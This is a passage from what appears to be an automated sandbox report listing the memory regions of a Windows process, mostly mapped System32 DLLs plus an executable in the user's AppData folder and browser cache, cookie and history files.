0x7573cfff entry_point = 0x756d3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2464 start_va = 0x75740000 end_va = 0x76389fff entry_point = 0x757c1601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2465 start_va = 0x76500000 end_va = 0x765d3fff entry_point = 0x7654bde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2466 start_va = 0x76800000 end_va = 0x7695bfff entry_point = 0x7684ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2467 start_va = 0x76bc0000 end_va = 0x76bc9fff entry_point = 0x76bc136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2468 start_va = 0x76bd0000 end_va = 0x76c98fff entry_point = 0x76bed711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2469 start_va = 0x76ca0000 end_va = 0x76e3cfff entry_point = 0x76ca17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2470 start_va = 0x76e40000 end_va = 0x76eebfff entry_point = 0x76e4a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2471 start_va = 0x77030000 end_va = 0x77048fff entry_point = 0x77034975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2472 start_va = 0x77060000 end_va = 0x770b6fff entry_point = 0x77079ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2473 start_va = 0x770d0000 end_va = 0x7711dfff entry_point = 0x770d9c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2474 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2475 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 2476 start_va = 0x76390000 end_va = 0x7645bfff entry_point = 0x7639168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2477 start_va = 0x767e0000 end_va = 0x767fefff entry_point = 0x767e1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2478 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2479 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = private name = "private_0x0000000000040000" filename = "" Region: id = 2480 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2481 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2482 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 2483 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2484 start_va = 0x550000 end_va = 0x942fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2485 start_va = 0xa00000 end_va = 0x15fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 2486 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 2487 start_va = 0x1600000 end_va = 0x18cefff entry_point = 0x1600000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2488 start_va = 0x3c0000 end_va = 0x3c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 2489 start_va = 0x74020000 end_va = 0x741bdfff entry_point = 0x7404e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 2490 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x3d0000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2491 start_va = 0x3e0000 end_va = 0x3e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 2492 start_va = 0x950000 end_va = 0x9abfff entry_point = 0x9735b9 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2493 start_va = 0x19b0000 end_va = 0x1aaffff entry_point = 0x0 region_type = private name = "private_0x00000000019b0000" filename = "" Region: id = 2494 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 2495 start_va = 0x950000 end_va = 0x9abfff entry_point = 0x9735b9 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2496 start_va = 0x74f90000 end_va = 0x74f9bfff entry_point = 0x74f910e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2497 start_va = 0x73ea0000 end_va = 0x73edffff entry_point = 0x73eaa2dd region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2498 start_va = 0x1ab0000 end_va = 0x1b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ab0000" filename = "" Region: id = 2499 start_va = 0x18d0000 end_va = 0x19aefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000018d0000" filename = "" Region: id = 2500 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 2501 start_va = 0x76970000 end_va = 0x769f2fff entry_point = 0x769723d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2502 start_va = 0x400000 end_va = 0x400fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2503 start_va = 0x73ee0000 end_va = 0x73fd4fff entry_point = 0x73ef0d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2504 start_va = 0x73790000 end_va = 0x737b0fff entry_point = 0x7379145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2505 start_va = 0x754a0000 end_va = 0x754e4fff entry_point = 0x754a11e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 2506 start_va = 0x410000 end_va = 0x413fff entry_point = 0x410000 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 2507 start_va = 0x950000 end_va = 0x96cfff entry_point = 0x950000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db") Region: id = 2508 start_va = 0x420000 end_va = 0x420fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 2509 start_va = 0x75040000 end_va = 0x7504afff entry_point = 0x75041992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2510 start_va = 0x970000 end_va = 0x993fff entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 2511 start_va = 0x73a40000 end_va = 0x73b3afff entry_point = 0x73a517e1 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 2512 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 2513 start_va = 0x410000 end_va = 0x418fff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 2514 start_va = 0x9a0000 end_va = 0x9c3fff entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 2515 start_va = 0x9d0000 end_va = 0x9d8fff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 2516 start_va = 0x1ba0000 end_va = 0x1c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ba0000" filename = "" Region: id = 2517 start_va = 0x711a0000 end_va = 0x711ebfff entry_point = 0x711a2c14 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 2518 start_va = 0x6d0f0000 end_va = 0x6e445fff entry_point = 0x6d0f0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 2519 start_va = 0x1d40000 end_va = 0x1e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 2520 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 2521 start_va = 0x1ab0000 end_va = 0x1af7fff entry_point = 0x0 region_type = private name = "private_0x0000000001ab0000" filename = "" Region: id = 2522 start_va = 0x1b60000 end_va = 0x1b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b60000" filename = "" Region: id = 2523 start_va = 0x6bd90000 end_va = 0x6d0e5fff entry_point = 0x6bd90000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 2524 start_va = 0x6d0f0000 end_va = 0x6e445fff entry_point = 0x6d0f0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 2525 start_va = 0x6bd90000 end_va = 0x6d0e5fff entry_point = 0x6bd90000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 2526 start_va = 0x970000 end_va = 0x981fff entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 2527 start_va = 0x6d0f0000 end_va = 0x6e445fff entry_point = 0x6d0f0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 2528 start_va = 0x6bd90000 end_va = 0x6d0e5fff entry_point = 0x6bd90000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 2529 start_va = 0x6d0f0000 end_va = 0x6e445fff entry_point = 0x6d0f0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 2530 start_va = 0x1b00000 end_va = 0x1b47fff entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 2531 start_va = 0x6bd90000 end_va = 0x6d0e5fff entry_point = 0x6bd90000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 2532 start_va = 0x6d0f0000 end_va = 0x6e445fff entry_point = 0x6d0f0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 2533 start_va = 0x6bd90000 end_va = 0x6d0e5fff entry_point = 0x6bd90000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 2534 start_va = 0x990000 end_va = 0x9a1fff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 2535 start_va = 0x6cfc0000 end_va = 0x6e315fff entry_point = 0x6cfc0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 2536 start_va = 0x6bc60000 end_va = 0x6cfb5fff entry_point = 0x6bc60000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 2537 start_va = 0x9b0000 end_va = 0x9c1fff entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 2538 start_va = 0x410000 end_va = 0x41cfff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 2539 start_va = 0x74f70000 end_va = 0x74f8afff entry_point = 0x74f793b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2540 start_va = 0x9d0000 end_va = 0x9dcfff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 2541 start_va = 0x751f0000 end_va = 0x7530cfff entry_point = 0x751f0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2542 start_va = 0x750b0000 end_va = 0x750bbfff entry_point = 0x750b0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2543 start_va = 0x76a80000 end_va = 0x76bb5fff entry_point = 0x76a80000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 2544 start_va = 0x755a0000 end_va = 0x75694fff entry_point = 0x755a0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 2545 start_va = 0x765e0000 end_va = 0x767dafff entry_point = 0x765e0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 2546 start_va = 0x746f0000 end_va = 0x74706fff entry_point = 0x746f0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2547 start_va = 0x73a20000 end_va = 0x73a2cfff entry_point = 0x73a20000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2548 start_va = 0x1ca0000 end_va = 0x1cb6fff entry_point = 0x1ca1d90 region_type = mapped_file name = "serverhost.exe" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe") Region: id = 2549 start_va = 0x1e40000 end_va = 0x1f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 2550 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 2551 start_va = 0x74b10000 end_va = 0x74b25fff entry_point = 0x74b10000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2552 start_va = 0x1ca0000 end_va = 0x1cdbfff entry_point = 0x1ca0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2553 start_va = 0x1ca0000 end_va = 0x1cdbfff entry_point = 0x1ca128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2554 start_va = 0x1ca0000 end_va = 0x1cdbfff entry_point = 0x1ca128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2555 start_va = 0x1ca0000 end_va = 0x1cdbfff entry_point = 0x1ca128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2556 start_va = 0x1ca0000 end_va = 0x1cdbfff entry_point = 0x1ca128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2557 start_va = 0x748b0000 end_va = 0x748eafff entry_point = 0x748b128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2558 start_va = 0x1b50000 end_va = 0x1b5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b50000" filename = "" Region: id = 2559 start_va = 0x1ca0000 end_va = 0x1ca3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ca0000" filename = "" Region: id = 2560 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2561 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2562 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2563 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2564 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2565 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2566 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2567 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2568 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2569 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2570 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2571 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2572 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2573 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2574 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2575 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2576 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2577 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2578 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2579 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2580 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2581 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2582 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2583 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2584 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2585 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2586 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2587 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2588 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2589 start_va = 0x1b50000 end_va = 0x1b53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2590 start_va = 0x1b50000 end_va = 0x1b51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 2591 start_va = 0x1ca0000 end_va = 0x1caffff entry_point = 0x1ca0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 2592 start_va = 0x1cb0000 end_va = 0x1cb7fff entry_point = 0x1cb0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 2593 start_va = 0x1cc0000 end_va = 0x1ccffff entry_point = 0x1cc0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 2594 start_va = 0x76460000 end_va = 0x76494fff entry_point = 0x76460000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2595 start_va = 0x770c0000 end_va = 0x770c5fff entry_point = 0x770c0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2596 start_va = 0x1f40000 end_va = 0x1fcffff entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 2597 start_va = 0x74990000 end_va = 0x749d3fff entry_point = 0x74990000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2598 start_va = 0x1fd0000 end_va = 0x205ffff entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 2599 start_va = 0x73360000 end_va = 0x7337bfff entry_point = 0x73360000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2600 start_va = 0x73350000 end_va = 0x73356fff entry_point = 0x73350000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2601 start_va = 0x76960000 end_va = 0x76962fff entry_point = 0x76960000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 2602 start_va = 0x6e320000 end_va = 0x6e371fff entry_point = 0x6e320000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 2603 start_va = 0x71c90000 end_va = 0x71ca4fff entry_point = 0x71c90000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 2604 start_va = 0x737c0000 end_va = 0x737ccfff entry_point = 0x737c0000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 2605 start_va = 0x1cd0000 end_va = 0x1cd0fff entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 2606 start_va = 0x1cd0000 end_va = 0x1cd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cd0000" filename = "" Region: id = 2607 start_va = 0x72570000 end_va = 0x72575fff entry_point = 0x72570000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 2608 start_va = 0x2060000 end_va = 0x215ffff entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 2609 start_va = 0x2320000 end_va = 0x241ffff entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 2610 start_va = 0x73480000 end_va = 0x7348ffff entry_point = 0x73480000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 2611 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 2612 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 2613 start_va = 0x2160000 end_va = 0x21effff entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 2614 start_va = 0x1ce0000 end_va = 0x1ceffff entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 2615 start_va = 0x2420000 end_va = 0x261ffff entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 2616 start_va = 0x21f0000 end_va = 0x22effff entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 2617 start_va = 0x6f6f0000 end_va = 0x6f6f5fff entry_point = 0x6f6f0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: 